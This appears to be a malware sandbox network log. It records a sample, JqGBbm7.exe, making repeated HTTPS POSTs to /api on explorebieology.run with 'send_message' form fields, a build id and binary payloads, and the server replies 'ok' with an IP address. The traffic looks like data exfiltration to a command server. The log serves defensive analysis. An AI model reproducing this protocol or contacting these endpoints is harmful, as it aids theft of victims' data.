2025-03-05 08:14:10 UTC	823	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:14:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2B5XzBhFf%2FsjBdf%2F84nieXBlxXSzpXhTwjTFG8SAhihaZBI%2F%2BNKOlziBxehlKeW2CVHRATfByz%2B6fZ3hniimTvyy9pEmMIBT7aW%2F5xgbebHLze9CCqS1Ayej5bihZy0SMTtRYEBP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b828822bbc75e1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1638&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1047&delivery_rate=1743283&cwnd=192&unsent_bytes=0&cid=0e40f383dca8766e&ts=486&x=0"
2025-03-05 08:14:10 UTC	546	IN	Data Raw: 31 36 30 65 0d 0a 59 33 62 2b 48 31 30 5a 37 58 6a 51 66 63 36 71 49 76 54 6b 6f 76 54 7a 62 78 4a 68 35 50 36 6d 6f 44 63 69 30 67 4d 38 74 4e 38 59 56 49 67 39 5a 79 33 42 57 71 4d 59 37 4a 42 57 68 70 48 48 32 4e 45 4f 64 6b 50 65 6d 4d 66 4d 52 45 66 2b 49 55 72 5a 2f 56 6b 51 6e 33 4d 75 66 4d 46 61 74 51 58 73 6b 48 6d 50 78 73 65 61 30 56 55 77 42 49 36 63 78 38 78 56 51 37 6c 73 54 4e 69 38 43 78 71 5a 64 7a 68 36 69 52 6d 38 45 4b 76 50 52 35 57 4f 7a 4a 32 65 42 33 39 44 79 4e 7a 44 32 68 55 59 38 45 35 5a 77 4c 34 75 46 34 31 30 66 32 54 42 41 2f 49 59 6f 49 67 59 31 6f 58 48 6c 70 38 4a 64 67 71 4d 6c 73 37 45 56 45 61 34 63 31 58 53 74 77 73 55 6d 6e 59 79 63 35 30 55 74 68 65 67 79 55 32 56 78 6f 37 57 6c 68 55 77 57 38 62 50 39 73 46 45 55 Data Ascii: 160eY3b+H10Z7XjQfc6qIvTkovTzbxJh5P6moDci0gM8tN8YVIg9Zy3BWqMY7JBWhpHH2NEOdkPemMfMREf+IUrZ/VkQn3MufMFatQXskHmPxsea0VUwBI6cx8xVQ7lsTNi8CxqZdzh6iRm8EKvPR5WOzJ2eB39DyNzD2hUY8E5ZwL4uF410f2TBA/IYoIgY1oXHlp8JdgqMls7EVEa4c1XStwsUmnYyc50UthegyU2Vxo7WlhUwW8bP9sFEU
2025-03-05 08:14:10 UTC	1369	IN	Data Raw: 78 74 4b 45 78 55 30 41 36 43 46 77 30 62 34 54 56 71 6c 2b 4d 58 57 49 44 50 49 41 34 74 45 41 6b 59 71 41 7a 74 45 44 64 51 79 55 6e 64 62 48 57 31 4b 38 5a 46 6a 62 76 67 38 55 6d 58 6f 79 64 59 6b 64 73 52 65 6f 79 55 36 61 6a 4d 4f 53 6b 6b 30 2b 51 34 47 45 68 4a 6f 56 63 62 4e 6c 57 63 53 2b 44 31 53 44 4d 79 59 37 69 42 62 79 52 2b 7a 43 52 70 75 50 79 35 47 5a 41 57 49 49 69 5a 2f 4e 78 56 4e 4b 73 32 6c 55 30 4c 4d 41 45 35 6c 36 4c 58 57 45 46 37 45 56 71 6f 67 4f 31 6f 48 59 31 73 6c 4e 58 67 43 58 69 76 62 42 52 46 48 77 66 68 44 50 2f 51 59 59 33 43 56 2f 63 6f 63 56 76 78 4b 6d 78 6b 57 62 6a 38 47 58 6e 41 74 37 41 6f 36 55 77 4d 56 56 52 4c 31 75 55 4e 61 7a 43 52 47 59 64 7a 59 37 77 56 71 31 42 2b 79 51 41 4b 61 4c 7a 4a 32 64 54 30 55 Data Ascii: xtKExU0A6CFw0b4TVql+MXWIDPIA4tEAkYqAztEDdQyUndbHW1K8ZFjbvg8UmXoydYkdsReoyU6ajMOSkk0+Q4GEhJoVcbNlWcS+D1SDMyY7iBbyR+zCRpuPy5GZAWIIiZ/NxVNKs2lU0LMAE5l6LXWEF7EVqogO1oHY1slNXgCXivbBRFHwfhDP/QYY3CV/cocVvxKmxkWbj8GXnAt7Ao6UwMVVRL1uUNazCRGYdzY7wVq1B+yQAKaLzJ2dT0U
2025-03-05 08:14:10 UTC	1369	IN	Data Raw: 73 4e 59 54 4c 5a 68 58 39 61 37 44 52 53 62 65 69 31 70 69 68 79 67 46 65 79 47 41 4a 47 65 67 4d 37 52 4f 32 41 55 6c 34 71 47 39 31 5a 4f 76 6d 5a 49 6c 71 4a 50 44 64 78 36 4d 7a 76 58 57 72 6b 66 6f 4d 39 49 6b 49 4c 49 6d 5a 34 45 59 67 4b 4b 6b 74 62 46 56 55 6d 2b 62 6c 4c 66 73 41 59 5a 6c 33 63 79 66 34 67 62 38 6c 48 73 7a 31 6a 57 33 6f 43 67 67 51 42 38 4c 59 32 51 7a 59 4a 4b 44 71 6b 68 57 64 72 39 57 56 53 59 63 54 64 78 67 42 4f 34 46 61 50 42 51 4a 36 50 79 5a 57 52 41 58 59 43 69 70 44 4a 78 31 5a 46 76 57 52 65 32 72 6f 47 46 64 77 7a 66 33 79 58 57 75 70 66 6e 4d 56 4d 6e 59 71 43 6f 35 49 44 66 67 53 51 33 4e 75 4d 54 41 43 33 62 52 36 4f 2f 51 34 56 6b 58 63 30 64 59 4d 62 73 68 75 76 77 6b 43 5a 67 38 61 65 6d 41 31 69 42 49 6d 64 Data Ascii: sNYTLZhX9a7DRSbei1pihygFeyGAJGegM7RO2AUl4qG91ZOvmZIlqJPDdx6MzvXWrkfoM9IkILImZ4EYgKKktbFVUm+blLfsAYZl3cyf4gb8lHsz1jW3oCggQB8LY2QzYJKDqkhWdr9WVSYcTdxgBO4FaPBQJ6PyZWRAXYCipDJx1ZFvWRe2roGFdwzf3yXWupfnMVMnYqCo5IDfgSQ3NuMTAC3bR6O/Q4VkXc0dYMbshuvwkCZg8aemA1iBImd
2025-03-05 08:14:10 UTC	1369	IN	Data Raw: 7a 77 4f 52 37 61 74 41 63 53 6d 58 45 2b 66 59 63 66 75 68 75 74 7a 6b 61 56 69 63 53 54 6b 41 4a 30 44 34 69 57 78 63 4e 5a 53 37 39 71 57 35 62 7a 51 52 4f 45 50 57 63 37 76 68 6d 6b 43 4c 7a 45 41 49 6e 49 32 64 61 57 41 54 42 62 78 70 33 57 79 46 39 4f 74 57 35 62 31 62 49 47 47 5a 70 78 4e 58 4b 48 48 4c 30 57 76 73 74 4d 6d 49 48 4f 6d 70 38 41 65 67 43 4c 33 49 71 43 55 6c 6a 77 4f 52 37 36 75 67 77 36 6c 33 45 34 4f 35 42 55 71 31 2b 72 78 41 44 4f 78 73 79 63 6e 51 52 77 43 6f 4f 55 7a 38 74 51 51 62 74 6b 58 64 43 77 44 68 32 4f 64 7a 78 31 6a 42 61 2b 47 61 33 4c 55 70 36 50 67 4e 6a 52 43 6d 68 44 33 74 7a 6c 7a 46 68 55 74 33 45 65 79 66 4d 59 56 4a 74 78 66 79 50 50 47 62 4d 51 72 38 6c 4e 6b 49 2f 49 6c 70 63 49 66 77 36 49 6d 38 50 43 57 Data Ascii: zwOR7atAcSmXE+fYcfuhutzkaVicSTkAJ0D4iWxcNZS79qW5bzQROEPWc7vhmkCLzEAInI2daWATBbxp3WyF9OtW5b1bIGGZpxNXKHHL0WvstMmIHOmp8AegCL3IqCUljwOR76ugw6l3E4O5BUq1+rxADOxsycnQRwCoOUz8tQQbtkXdCwDh2Odzx1jBa+Ga3LUp6PgNjRCmhD3tzlzFhUt3EeyfMYVJtxfyPPGbMQr8lNkI/IlpcIfw6Im8PCW
2025-03-05 08:14:10 UTC	1001	IN	Data Raw: 47 6c 72 6b 4c 47 35 68 36 4d 33 32 4b 48 4c 38 65 6f 38 6c 41 6d 59 4c 4c 6e 35 63 4d 66 51 61 4c 6d 4e 62 49 58 6b 2b 38 61 46 4c 62 2f 55 39 55 6d 32 56 2f 49 38 38 72 76 78 47 69 7a 31 62 57 6d 59 36 50 30 51 70 38 51 39 37 63 78 63 35 61 51 37 39 69 58 64 65 33 45 77 61 51 64 44 64 2b 67 78 47 38 47 62 37 4f 54 35 2b 46 77 35 2b 57 42 58 77 4a 68 5a 75 45 6a 42 56 48 71 43 45 47 6c 70 34 57 42 4a 45 39 49 44 57 57 57 72 55 54 37 4a 41 41 6e 6f 76 49 6e 4a 55 4b 66 51 53 41 6c 64 62 4c 55 45 36 77 5a 56 58 5a 75 77 55 58 6e 47 38 35 66 34 63 5a 76 78 4b 69 79 30 54 57 79 49 43 52 69 55 30 6f 51 37 53 52 79 74 6c 61 52 36 46 72 48 73 6e 7a 47 46 53 62 63 58 38 6a 7a 78 36 38 44 61 66 4a 53 35 32 49 78 35 6d 55 42 33 41 4d 67 70 2f 4b 79 56 52 44 75 47 Data Ascii: GlrkLG5h6M32KHL8eo8lAmYLLn5cMfQaLmNbIXk+8aFLb/U9Um2V/I88rvxGiz1bWmY6P0Qp8Q97cxc5aQ79iXde3EwaQdDd+gxG8Gb7OT5+Fw5+WBXwJhZuEjBVHqCEGlp4WBJE9IDWWWrUT7JAAnovInJUKfQSAldbLUE6wZVXZuwUXnG85f4cZvxKiy0TWyICRiU0oQ7SRytlaR6FrHsnzGFSbcX8jzx68DafJS52Ix5mUB3AMgp/KyVRDuG
2025-03-05 08:14:10 UTC	1369	IN	Data Raw: 33 33 38 36 0d 0a 43 49 47 4e 61 50 7a 70 71 53 43 6e 67 4c 67 35 7a 50 77 6c 70 4b 76 6d 5a 4d 33 4c 45 4c 42 70 4e 2b 4d 6e 2b 43 45 4c 63 57 76 73 31 4a 6b 4d 61 4f 31 70 59 56 4d 46 76 47 70 4d 2f 4d 5a 30 4f 72 49 55 47 59 70 45 45 54 6b 44 31 6e 4f 34 77 64 73 52 36 6d 77 55 79 5a 67 63 53 45 6d 77 70 69 41 6f 65 58 79 63 35 56 54 62 31 72 58 39 2b 77 44 52 6d 62 65 6a 42 2b 7a 31 54 79 47 4c 53 49 47 4e 61 6e 7a 5a 32 64 56 69 70 44 6d 64 4c 64 67 6c 4a 4d 38 44 6b 65 31 72 63 45 48 70 46 2b 4d 48 69 64 47 37 51 4e 72 4d 56 4b 68 49 7a 4c 6b 35 77 41 66 51 43 41 6d 73 2f 4f 52 30 6d 77 59 6c 57 57 38 30 45 54 68 44 31 6e 4f 36 77 4e 70 42 57 72 78 46 61 64 68 38 4f 41 6e 42 30 77 54 63 61 4e 77 39 4d 56 47 4b 5a 78 53 64 47 69 54 77 33 63 65 6a 4d Data Ascii: 3386CIGNaPzpqSCngLg5zPwlpKvmZM3LELBpN+Mn+CELcWvs1JkMaO1pYVMFvGpM/MZ0OrIUGYpEETkD1nO4wdsR6mwUyZgcSEmwpiAoeXyc5VTb1rX9+wDRmbejB+z1TyGLSIGNanzZ2dVipDmdLdglJM8Dke1rcEHpF+MHidG7QNrMVKhIzLk5wAfQCAms/OR0mwYlWW80EThD1nO6wNpBWrxFadh8OAnB0wTcaNw9MVGKZxSdGiTw3cejM
2025-03-05 08:14:10 UTC	1369	IN	Data Raw: 69 2b 76 77 30 79 57 69 39 58 57 6a 6b 4e 70 51 34 47 51 68 4a 6f 56 53 4c 74 71 57 4e 32 2b 41 68 71 58 64 7a 42 30 68 52 79 30 46 36 6e 49 54 4a 61 44 78 70 4b 56 41 33 63 4e 69 35 33 57 77 56 77 41 2f 69 46 5a 7a 76 31 5a 56 4c 78 32 4b 58 36 49 44 50 41 71 72 38 5a 4f 6b 5a 43 41 69 61 35 44 4d 41 79 63 33 4a 7a 37 54 41 43 33 62 52 36 4f 2f 52 51 54 6e 48 6f 6c 62 59 67 57 6f 78 53 68 78 47 4b 5a 67 64 61 56 6e 67 35 68 43 73 71 58 79 59 49 62 41 4c 64 35 48 6f 37 39 4c 68 4f 4b 66 68 42 34 6e 68 50 79 55 65 7a 50 56 74 62 65 67 4b 6a 52 48 33 4d 54 68 5a 50 56 2f 42 55 59 71 56 38 65 33 61 73 47 42 4a 39 72 4e 48 61 44 43 34 78 66 39 4a 77 53 78 4e 53 53 78 49 35 4e 62 7a 7a 49 33 4d 57 43 44 58 6d 70 49 55 69 57 35 56 4e 61 33 47 39 2f 49 38 39 64 Data Ascii: i+vw0yWi9XWjkNpQ4GQhJoVSLtqWN2+AhqXdzB0hRy0F6nITJaDxpKVA3cNi53WwVwA/iFZzv1ZVLx2KX6IDPAqr8ZOkZCAia5DMAyc3Jz7TAC3bR6O/RQTnHolbYgWoxShxGKZgdaVng5hCsqXyYIbALd5Ho79LhOKfhB4nhPyUezPVtbegKjRH3MThZPV/BUYqV8e3asGBJ9rNHaDC4xf9JwSxNSSxI5NbzzI3MWCDXmpIUiW5VNa3G9/I89d
2025-03-05 08:14:10 UTC	1369	IN	Data Raw: 74 53 68 4d 6e 52 67 4a 77 64 64 30 2b 4f 6a 63 6e 4f 46 51 37 77 4c 56 72 64 73 51 51 54 6a 44 49 74 61 34 51 57 70 46 4f 6f 32 67 44 59 78 74 47 64 6e 68 39 2b 42 4d 6d 4e 30 73 39 46 51 37 56 6d 45 74 36 73 44 42 6a 63 4d 33 39 75 68 42 61 30 45 72 6d 48 55 59 43 46 31 70 48 64 42 57 45 4f 69 74 7a 37 6a 42 56 59 38 44 6b 65 34 37 34 50 47 70 74 72 4c 6a 61 76 45 62 34 63 6f 4d 6c 48 31 73 69 41 6b 4e 46 56 49 30 33 47 6d 4e 57 43 44 52 44 69 4f 67 75 46 36 6c 46 47 67 7a 4d 6d 4f 35 6c 61 36 6b 33 69 69 46 4c 57 33 6f 44 52 6b 68 39 69 42 59 57 4b 78 34 56 72 66 72 46 73 55 5a 71 7a 43 68 53 62 62 53 6c 67 77 78 4b 78 42 62 62 32 66 72 32 4b 78 70 47 4c 43 6e 59 6c 70 74 79 4b 67 6c 6f 41 36 46 67 65 6e 76 30 2b 57 74 78 6c 66 79 50 50 4c 37 45 52 6f Data Ascii: tShMnRgJwdd0+OjcnOFQ7wLVrdsQQTjDIta4QWpFOo2gDYxtGdnh9+BMmN0s9FQ7VmEt6sDBjcM39uhBa0ErmHUYCF1pHdBWEOitz7jBVY8Dke474PGptrLjavEb4coMlH1siAkNFVI03GmNWCDRDiOguF6lFGgzMmO5la6k3iiFLW3oDRkh9iBYWKx4VrfrFsUZqzChSbbSlgwxKxBbb2fr2KxpGLCnYlptyKgloA6Fgenv0+WtxlfyPPL7ERo
2025-03-05 08:14:10 UTC	1369	IN	Data Raw: 6a 7a 5a 75 55 41 33 64 42 70 35 62 55 7a 31 70 48 38 43 38 65 32 76 31 5a 56 4a 31 33 4c 33 61 41 48 66 34 59 74 73 38 41 32 4d 62 4f 31 73 6c 4e 63 51 6d 57 6b 63 76 46 47 55 61 2b 62 78 37 4a 38 78 68 55 69 6a 31 6e 4b 4d 46 61 6f 46 2f 30 69 41 65 59 69 38 47 56 6e 77 35 69 45 59 43 66 30 73 45 53 66 6f 35 45 55 39 75 34 44 78 4f 69 51 78 35 78 6e 78 65 39 47 4f 37 6f 52 34 43 46 2f 71 69 6d 48 48 63 54 78 4c 72 48 31 46 59 41 2f 69 46 47 6c 75 56 42 4e 5a 5a 74 4d 6e 53 49 57 4a 49 59 75 73 73 41 32 4d 62 45 31 73 6c 4e 56 51 36 4c 6d 63 72 46 46 32 47 36 63 56 50 5a 75 6b 4d 30 6d 32 73 38 4f 38 46 61 76 6c 2f 30 69 45 47 63 6c 73 32 5a 6c 6b 46 33 47 59 48 63 69 6f 4a 62 41 4f 67 68 58 39 79 74 44 42 75 62 4d 54 6c 31 67 56 71 74 55 62 57 49 56 74 Data Ascii: jzZuUA3dBp5bUz1pH8C8e2v1ZVJ13L3aAHf4Yts8A2MbO1slNcQmWkcvFGUa+bx7J8xhUij1nKMFaoF/0iAeYi8GVnw5iEYCf0sESfo5EU9u4DxOiQx5xnxe9GO7oR4CF/qimHHcTxLrH1FYA/iFGluVBNZZtMnSIWJIYussA2MbE1slNVQ6LmcrFF2G6cVPZukM0m2s8O8Favl/0iEGcls2ZlkF3GYHcioJbAOghX9ytDBubMTl1gVqtUbWIVt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	104.21.31.208	443	7280	C:\Users\user\Desktop\JqGBbm7.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:14:11 UTC	371	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XP2FTWXZX62T3ES Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18154 Host: explorebieology.run
2025-03-05 08:14:11 UTC	15331	OUT	Data Raw: 2d 2d 58 50 32 46 54 57 58 5a 58 36 32 54 33 45 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 58 50 32 46 54 57 58 5a 58 36 32 54 33 45 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 0d 0a 2d 2d 58 50 32 46 54 57 58 5a 58 36 32 54 33 45 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 50 32 46 54 57 58 5a 58 36 32 54 33 45 53 0d 0a 43 6f Data Ascii: --XP2FTWXZX62T3ESContent-Disposition: form-data; name="act"send_message--XP2FTWXZX62T3ESContent-Disposition: form-data; name="lid"1vJIvk--mix-labs-20k--XP2FTWXZX62T3ESContent-Disposition: form-data; name="pid"2--XP2FTWXZX62T3ESCo
2025-03-05 08:14:11 UTC	2823	OUT	Data Raw: df 36 07 1f bf e7 f9 79 7f 79 db f7 f3 ce 06 9c aa b1 f9 d3 28 9b e1 7b 39 ea e7 3d 1c f3 7a 1c 57 9e dc 9b 7b 82 1b bd 9a ba 45 22 d3 01 75 28 77 d7 c7 3d 22 9b 56 82 b3 d1 b0 6f e8 78 99 42 eb f4 b0 ef 7b 76 26 b4 b0 f4 4c e5 b1 81 1f c4 2c 37 bd 4b 40 e2 ca 93 b0 56 c0 ff 1f 00 00 00 90 42 b0 fe 03 00 00 00 e9 03 eb 3f 00 00 00 90 3e b0 fe 03 00 00 00 e9 03 eb 3f 00 00 00 90 3e b0 fe 03 00 00 00 e9 03 eb 3f 00 00 00 90 3e b0 fe 03 00 00 00 e9 03 fe ff 00 00 00 80 f4 81 fd 3f 00 00 00 90 3e 4e f1 0b d6 7f 00 00 00 20 55 60 ff 0f 00 00 00 a4 0f ec ff 01 00 00 80 f4 c1 f7 ff a7 fa ce 09 d9 d9 be 4a df b9 dc df e7 76 07 fe 6a a0 d4 bf df 3f 99 b5 84 8f 85 8f 73 6f 42 47 e9 63 f5 83 9c a4 cd 27 1d bc 16 3e cd cb 3f e3 cd 3b 20 cf 56 8a 49 31 17 5b ab ef 8b Data Ascii: 6yy({9=zW{E"u(w="VoxB{v&L,7K@VB?>?>?>?>N U`Jvj?soBGc'>?; VI1[
2025-03-05 08:14:12 UTC	820	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:14:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sWCjMDHAncGMFIa8J%2FEvaN78rWJZngE%2FQ1xbkZtG%2Bd%2BGV%2Ban37S0prJopSajd4Rb5CZErJ7spGKIJnv3IOYDwzIb0ynq31q4qqb8PiwRuduN9ixolsUWTAFq06C4GlCJmYMQLQWh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b828899d4c42f1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1624&rtt_var=626&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2848&recv_bytes=19205&delivery_rate=1722713&cwnd=184&unsent_bytes=0&cid=47ed3926601f6dc3&ts=857&x=0"
2025-03-05 08:14:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-03-05 08:14:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	104.21.31.208	443	7280	C:\Users\user\Desktop\JqGBbm7.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:14:13 UTC	370	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SD83XGQ5HVYPN1T Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8775 Host: explorebieology.run
2025-03-05 08:14:13 UTC	8775	OUT	Data Raw: 2d 2d 53 44 38 33 58 47 51 35 48 56 59 50 4e 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 53 44 38 33 58 47 51 35 48 56 59 50 4e 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 0d 0a 2d 2d 53 44 38 33 58 47 51 35 48 56 59 50 4e 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 44 38 33 58 47 51 35 48 56 59 50 4e 31 54 0d 0a 43 6f Data Ascii: --SD83XGQ5HVYPN1TContent-Disposition: form-data; name="act"send_message--SD83XGQ5HVYPN1TContent-Disposition: form-data; name="lid"1vJIvk--mix-labs-20k--SD83XGQ5HVYPN1TContent-Disposition: form-data; name="pid"2--SD83XGQ5HVYPN1TCo
2025-03-05 08:14:13 UTC	812	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:14:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nPhjFOvTklF0dAmnxtwci37%2BXe7EZAScP2a5F6w9Q3C7xiwkp4I27tNP53mkbWDcnBgfb9GbtC6%2BUg2AIDbYC7QC4r8FuBiPvURhPMIFOeOyao2h9QLpHbRjGsa8ESv65v6vukaW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b82893adb1c33f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1601&rtt_var=608&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9803&delivery_rate=1788120&cwnd=192&unsent_bytes=0&cid=93866c4b7a79e1ac&ts=659&x=0"
2025-03-05 08:14:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-03-05 08:14:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49737	104.21.31.208	443	7280	C:\Users\user\Desktop\JqGBbm7.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:14:14 UTC	368	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ASPGXNLNWEAE Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20410 Host: explorebieology.run
2025-03-05 08:14:14 UTC	15331	OUT	Data Raw: 2d 2d 41 53 50 47 58 4e 4c 4e 57 45 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 41 53 50 47 58 4e 4c 4e 57 45 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 0d 0a 2d 2d 41 53 50 47 58 4e 4c 4e 57 45 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 53 50 47 58 4e 4c 4e 57 45 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 Data Ascii: --ASPGXNLNWEAEContent-Disposition: form-data; name="act"send_message--ASPGXNLNWEAEContent-Disposition: form-data; name="lid"1vJIvk--mix-labs-20k--ASPGXNLNWEAEContent-Disposition: form-data; name="pid"3--ASPGXNLNWEAEContent-Dispos
2025-03-05 08:14:14 UTC	5079	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2025-03-05 08:14:15 UTC	817	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:14:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gP8OTJiaoBOXbtRGx0DTMA4LQIY35lVUd%2FVbMWPJ1oZuSYiAaa%2FtejhIvbzbXD3dWfblpKpFTTpND7wng%2FWtc1bGSzykWcVDmiBqdMFtGZUE41sJgI%2FmW0zVy5oc3m4NZDBHA00m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b8289c5b824693-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1655&rtt_var=624&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2850&recv_bytes=21458&delivery_rate=1749550&cwnd=58&unsent_bytes=0&cid=b8fc119dbb9adad3&ts=709&x=0"
2025-03-05 08:14:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
